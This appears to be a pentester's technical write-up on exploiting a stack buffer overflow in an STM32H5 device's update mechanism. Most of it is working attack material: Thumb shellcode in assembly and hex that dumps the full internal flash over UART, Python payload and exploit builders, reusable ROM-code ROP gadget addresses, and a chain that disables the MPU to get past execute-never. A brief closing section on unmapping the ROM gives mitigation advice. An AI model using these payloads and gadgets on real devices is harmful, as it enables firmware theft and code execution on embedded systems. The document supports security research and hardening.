- The unhardened approach: a stack shellcode
- Going further: bypassing a non executable stack
- Protecting against ROP
During a pentest I found an exploitable stack-based buffer overflow in the update mechanism of an embedded system running on an STM32H5. This system lacked critical protections that will be discussed here.
This article assumes you are familiar with binary exploitation techniques.
The unhardened approach: a stack shellcode
Dropping a shellcode on the stack and jumping to it is the textbook exploitation you’ve probably seen a hundred times in CTFs. We will overwrite the saved return address with our own, pointing it at the stack address that contains the shellcode, which is placed right after it.
There are no major hurdles here. We just need two pieces of information:
- where exactly the overflow overwrites register LR
- what the address of the stack is
The first one is obtained by bruteforcing payloads until a crash is seen. The second one is easy if the payload is of unlimited length: just insert a NOP sled and jump to a stack address that makes sense for this system. In this case the initial range can be guessed: since the overflow happens very early in the boot, the stack has to be in the low range of the SRAM at 0x20000000, which is easily bruteforced. There’s also a clean way of leaking the stack pointer which we’ll discuss later on.

The shellcode will be written in THUMB mode because the MCU is sure to be running in this mode: Cortex-M cores such as this one only execute THUMB instructions, a higher-density instruction set that’s used a lot in small embedded systems. The only thing to pay attention to is to add +1 to every address we branch to indirectly (return addresses, function pointers) to tell the processor to stay in THUMB mode.
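The layout described above can be sketched in Python. This is only an illustration: the offset to the saved LR, the sled length and the upper bound of the guessed stack range are hypothetical values that have to be found on the actual target.

```python
import struct

THUMB_NOP = b"\x00\xbf"  # 16-bit Thumb NOP (0xBF00), stored little-endian


def build_payload(offset_to_lr, target, shellcode, sled_halfwords=256):
    """Padding up to the saved LR, new return address, NOP sled, shellcode."""
    if target % 2:
        raise ValueError("pass the even address, the Thumb bit is added here")
    # Bit 0 set so that the core stays in Thumb state when returning.
    return_address = struct.pack("<I", target | 1)
    sled = THUMB_NOP * sled_halfwords
    return b"A" * offset_to_lr + return_address + sled + shellcode


def candidate_targets(start=0x20000000, end=0x20010000, sled_halfwords=256):
    """Stack addresses to try, one guess per sled length (range is a guess)."""
    return range(start, end, 2 * sled_halfwords)


# Hypothetical values: 64 bytes of padding, a guess at 0x20000400,
# and a placeholder shellcode made of a single "b ." (0xE7FE).
payload = build_payload(64, 0x20000400, b"\xfe\xe7")
```

Spacing the guesses by one sled length means that any guess landing inside the sled slides into the shellcode, which keeps the bruteforce short.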
The constructed payload will dump the full internal flash on USART1, which we know is routed and open. From this MCU’s datasheet, the flash starts at 0x08000000 and ends at 0x08200000. The payload will read one byte from the flash, wait until the TXE flag (bit 7) of the USART1_ISR register is set, meaning the transmitter is ready, and then write that one byte of firmware to the USART1_TDR register. Then it loops back to reading the next byte.
Written in assembly, it looks like this:
.thumb
.syntax unified
.global start
start:
@ USART1 register base
movw r2, #0x3800
movt r2, #0x4001
@ flash start
movw r3, #0x0000
movt r3, #0x0800
@ flash end
movw r4, #0x0000
movt r4, #0x0820
loop:
ldrb r1, [r3], #1 @ read one byte of flash and post-increment the pointer
wait:
ldr r0, [r2, #0x1C] @ read USART1 interrupt and status register
tst r0, #0x80 @ test TXE (bit 7), set when the transmit register is empty
beq wait @ USART1 is still busy, poll again
strb r1, [r2, #0x28] @ write to USART1 transmit data register
cmp r3, r4 @ check if end has been reached
bne loop
It’s assembled using a cross-compilation toolchain:
arm-none-eabi-as -mthumb -o code.o code.s
arm-none-eabi-objcopy -O binary code.o code.bin
The resulting shellcode:
43 F6 00 02 C4 F2 01 02 40 F2 00 03 C0 F6 00 03 40 F2 00 04 C0 F6 20 04 13 F8 01 1B
D0 69 10 F0 80 0F FB D0 82 F8 28 10 A3 42 F5 D1
When in doubt, Jonathan Salwan’s online disassembler can be used to verify the payload.
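As a quick offline sanity check, the constants loaded by the movw/movt pairs can also be recovered from the raw bytes. The sketch below only decodes the 32-bit Thumb-2 MOVW and MOVT immediate encodings and skips everything else, so it is not a disassembler; the helper names are made up for this example.

```python
import struct

SHELLCODE = bytes.fromhex(
    "43 F6 00 02 C4 F2 01 02 40 F2 00 03 C0 F6 00 03 "
    "40 F2 00 04 C0 F6 20 04 13 F8 01 1B "
    "D0 69 10 F0 80 0F FB D0 82 F8 28 10 A3 42 F5 D1"
)


def is_wide(halfword):
    """A Thumb instruction is 32 bits long when its top five bits are 11101, 11110 or 11111."""
    return (halfword >> 11) in (0b11101, 0b11110, 0b11111)


def load_constants(code):
    """Return {register: value} built from the MOVW/MOVT instructions in code."""
    regs = {}
    off = 0
    while off < len(code):
        (hw1,) = struct.unpack_from("<H", code, off)
        if not is_wide(hw1):
            off += 2
            continue
        (hw2,) = struct.unpack_from("<H", code, off + 2)
        off += 4
        kind = hw1 & 0xFBF0  # mask out the i bit and imm4
        if kind in (0xF240, 0xF2C0) and not hw2 & 0x8000:
            # imm16 = imm4:i:imm3:imm8
            imm16 = ((hw1 & 0xF) << 12) | (((hw1 >> 10) & 1) << 11) \
                | (((hw2 >> 12) & 0x7) << 8) | (hw2 & 0xFF)
            rd = (hw2 >> 8) & 0xF
            if kind == 0xF240:   # MOVW: sets the low half, clears the high half
                regs[rd] = imm16
            else:                # MOVT: sets the high half, keeps the low half
                regs[rd] = (regs.get(rd, 0) & 0xFFFF) | (imm16 << 16)
    return regs


constants = load_constants(SHELLCODE)
for reg, value in sorted(constants.items()):
    print(f"r{reg} = 0x{value:08X}")
```

The three recovered values should match the USART1 base, the flash start and the flash end used in the assembly listing.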
Going further: bypassing a non executable stack
The previous attack assumed that there were no protections on this system. The most obvious protection is to forbid execution from the stack; on x86 architectures this is usually called NX. In ARM’s case it’s named XN for eXecute-Never and is handled by a component named the Memory Protection Unit (MPU). It’s supposed to be set programmatically in the early boot stages. This MPU is described in ST’s Application Note AN4838.

If you’re following along on a development board, these are the OpenOCD commands to set it:
mww 0xE000ED98 0 ;# MPU_RNR: select a region to program, since it's a new one we start at 0
mww 0xE000ED9C 0x20000003 ;# MPU_RBAR: set the base address of the region to protect and flags (bit 0 is XN)
mww 0xE000EDA0 0x2007FF03 ;# MPU_RLAR (the ARMv8-M MPU of the Cortex-M33 has no RASR): set the region limit address, attribute index and enable bit
mww 0xE000ED94 0x00000005 ;# MPU_CTRL: enable the MPU
When this protection is set, jumping to the shellcode in SRAM will cause a MemManage fault and trigger a reset.
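To see what the two region words actually encode, here is a small decoder. It assumes the ARMv8-M MPU layout used by Cortex-M33 cores, in which the word at 0xE000ED9C holds the base address, shareability, access permissions and the XN bit, and the word at 0xE000EDA0 holds the limit address, an attribute index and the enable bit. The function names are made up for this sketch.

```python
def decode_rbar(value):
    """Decode a region base word (ARMv8-M layout assumed)."""
    return {
        "base": value & 0xFFFFFFE0,          # bits 31:5, 32-byte granularity
        "shareability": (value >> 3) & 0x3,  # bits 4:3
        "access": (value >> 1) & 0x3,        # bits 2:1, 0b01 = read/write at any privilege
        "execute_never": bool(value & 1),    # bit 0
    }


def decode_rlar(value):
    """Decode a region limit word (ARMv8-M layout assumed)."""
    return {
        "limit": (value & 0xFFFFFFE0) | 0x1F,  # last byte covered by the region
        "attr_index": (value >> 1) & 0x7,      # bits 3:1
        "enabled": bool(value & 1),            # bit 0
    }


rbar = decode_rbar(0x20000003)
rlar = decode_rlar(0x2007FF03)
print(f"region 0x{rbar['base']:08X}-0x{rlar['limit']:08X}, XN={rbar['execute_never']}")
```

Read this way, the region starts at the bottom of the SRAM, is readable and writable, and has execute-never set, which is the behaviour observed when jumping to the shellcode.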
How to get around this protection? Historically, NX is bypassed using Return-Oriented Programming (ROP). It consists of chaining small bits of already existing code, called gadgets, into a sequence that will execute arbitrary code.
The problem is that you first need a firmware dump to identify gadgets. Since the goal here is to dump the firmware we’ve got ourselves a bit of a chicken and egg problem. That’s when I got the idea to use the ROM code to ROP. The ROM code is a tiny proprietary burned-in bootloader used to flash the target. It is the same for every chip which makes it the perfect candidate for ROP. Everyone can now reuse this research!
The ROM code was dumped from a development board. Gadgets were identified using Ropper:
ropper -f /home/gquere/stm32h5/bootrom.bin -a ARMTHUMB --inst-count 2 -I 0xbf97000
I’ve selected a few for you that you can use to read and write anywhere. Of course there are many others!
0x0bf994b3 str r0, [r4]; pop {r4, pc};
0x0bf97379 ldr r0, [r4]; bx lr;
0x0bf9a927 pop {r0, r4, pc};
0x0bf99b6b pop {r0, pc};
Also of use, the UART byte-write function found after a bit of reverse-engineering: 0xbf9dfbc. Remember to increment by one when calling in THUMB mode!
Naive approach 1: dumping the firmware directly on UART
It had been a while since I last did ROP so I had pretty much forgotten everything. I naively tried to replicate the shellcode in ROP:
0x0bf9a927 pop {r0, r4, pc};
0x73 r0='s'
0x40013828 r4=USART1_TDR
0x0bf994b3 str r0, [r4]; pop {r4, pc}
0xDEADBEEF junk to pop in r4
... do that again for any number of bytes ...
This didn’t work well because the UART would hang if written to too fast. But it can be used to leak arbitrary bytes, one by one! Want to leak a stack pointer? You now have all the gadgets to do so.
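Writing these chains by hand gets tedious, so here is a minimal Python sketch that generates them from the two gadgets listed earlier. The helper names are made up; the first word of the chain is the one that lands on the saved return address.

```python
import struct

POP_R0_R4_PC = 0x0BF9A927  # pop {r0, r4, pc}
STR_R0_R4 = 0x0BF994B3     # str r0, [r4]; pop {r4, pc}
USART1_TDR = 0x40013828
JUNK = 0xDEADBEEF          # popped into r4 by the second gadget, never used


def write_word(value, address):
    """Five stack words that store value at address using the two gadgets."""
    return [POP_R0_R4_PC, value, address, STR_R0_R4, JUNK]


def uart_chain(data):
    """One write_word block per byte, each block ending where the next begins."""
    words = []
    for byte in data:
        words += write_word(byte, USART1_TDR)
    return struct.pack(f"<{len(words)}I", *words)


chain = uart_chain(b"s")
print(chain.hex())
```

Each byte costs five 32-bit words, that is 20 bytes of payload. The same write_word helper works for any address, which is how a single stack word could be leaked by first loading it with the ldr gadget.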
Naive approach 2: calling the firmware functions
OK so the UART cannot be directly written to because it’s hard to monitor the status of said UART in ROP. Simple solution: call the ROM code function that writes to the UART since it does handle the status check before writing.
Problem 1: you can’t easily write loops in ROP, your program has to be a linear chain of gadget addresses. This means that for each byte you want to dump you need to write a 20-byte payload. For a 2MB internal flash that adds up to roughly 40MB, which seems like quite a big payload!
Problem 2: the UART write function actually ends in bx lr and not with a pop {..}. This makes it harder to call since LR has to be set beforehand. I didn’t want to deal with that. If you want to, I think you could do it using these two gadgets to build a LR sled:
0x0bf98eb5 pop {pc};
0x0bf99a2f pop.w {r1, r2, r4, lr}; bx r0;
The right approach: ROP + shellcode
The proper way to bypass XN is to write a tiny ROP chain that will disable the MPU and to then jump to a shellcode in SRAM since it will be rendered executable.
That’s very easy, all that is needed is to write 0 to MPU_CTRL at address 0xE000ED94:
0x0bf9a927 pop {r0, r4, pc};
0x0 r0
0xE000ED94 r4=MPU_CTRL
0x0bf994b3 str r0, [r4]; pop {r4, pc}
0xDEADBEEF junk to pop in r4
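The last gadget ends with pop {r4, pc}, so the word following the junk is loaded into PC: make it the stack address of the shellcode (+1 for THUMB mode), then just append the shellcode and you’re done!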
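Put together, the final payload could be generated along these lines. This is a sketch under assumptions: the offset to the saved return address and the stack address of that slot are hypothetical and must be determined on the target (by bruteforce or by leaking the stack pointer).

```python
import struct

POP_R0_R4_PC = 0x0BF9A927  # pop {r0, r4, pc}
STR_R0_R4 = 0x0BF994B3     # str r0, [r4]; pop {r4, pc}
MPU_CTRL = 0xE000ED94
JUNK = 0xDEADBEEF
CHAIN_WORDS = 6            # five words for the write, one for the final PC


def build_exploit(offset_to_lr, return_slot_addr, shellcode):
    """Padding, ROP chain that writes 0 to MPU_CTRL, then the shellcode."""
    # The shellcode sits right after the chain on the stack.
    shellcode_addr = return_slot_addr + 4 * CHAIN_WORDS
    chain = [
        POP_R0_R4_PC,
        0,                   # r0 = 0
        MPU_CTRL,            # r4 = MPU_CTRL
        STR_R0_R4,           # disables the MPU, then pops r4 and pc
        JUNK,                # r4, unused
        shellcode_addr | 1,  # pc, bit 0 set for Thumb
    ]
    return b"A" * offset_to_lr + struct.pack("<6I", *chain) + shellcode


# Hypothetical values: 64 bytes of padding, return slot at 0x20000400,
# and a placeholder shellcode made of a single "b ." (0xE7FE).
exploit = build_exploit(64, 0x20000400, b"\xfe\xe7")
```

If the stack address is only known approximately, a NOP sled can be inserted between the chain and the shellcode, as in the unhardened case.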
Protecting against ROP
What made this attack work is that we’ve used the “public” ROM code to build a ROP chain. The way to protect against this is to unmap this region when setting the MPU. This is done by defining all needed regions (that is at least code, SRAM and peripherals) and then making other regions inaccessible.
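The effect of such a configuration can be modelled in a few lines of Python. The region table below is a hypothetical example, not the layout of the audited system, and the model is deliberately simplified: an address outside every region is only executable if the default memory map is left enabled as a background region, which is what the PRIVDEFENA bit of MPU_CTRL does for privileged code.

```python
from typing import NamedTuple


class Region(NamedTuple):
    name: str
    base: int
    limit: int          # last address covered, inclusive
    execute_never: bool


# Hypothetical layout: only the firmware flash is executable.
REGIONS = [
    Region("flash", 0x08000000, 0x081FFFFF, False),
    Region("sram", 0x20000000, 0x2009FFFF, True),
    Region("peripherals", 0x40000000, 0x5FFFFFFF, True),
]


def can_execute(address, regions=REGIONS, background_map=False):
    """True if an instruction fetch at address would be allowed in this model."""
    for region in regions:
        if region.base <= address <= region.limit:
            return not region.execute_never
    # Outside every region: allowed only if the default map is kept as background.
    return background_map


ROM_GADGET = 0x0BF9A926  # pop {r0, r4, pc} without the Thumb bit
print(can_execute(ROM_GADGET))                       # background map disabled
print(can_execute(ROM_GADGET, background_map=True))  # background map enabled
```

In this model the ROM gadgets only become unreachable once the background map is disabled, so defining the regions is not enough if privileged code can still fall back on the default memory map.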
It might still be possible to exploit a fully hardened MPU under special circumstances:
- you have prior access to the firmware and can extract gadgets from it, that means you can ROP from the actual firmware
- you are able to blind ROP, it’s a known technique but I doubt it works well for embedded systems!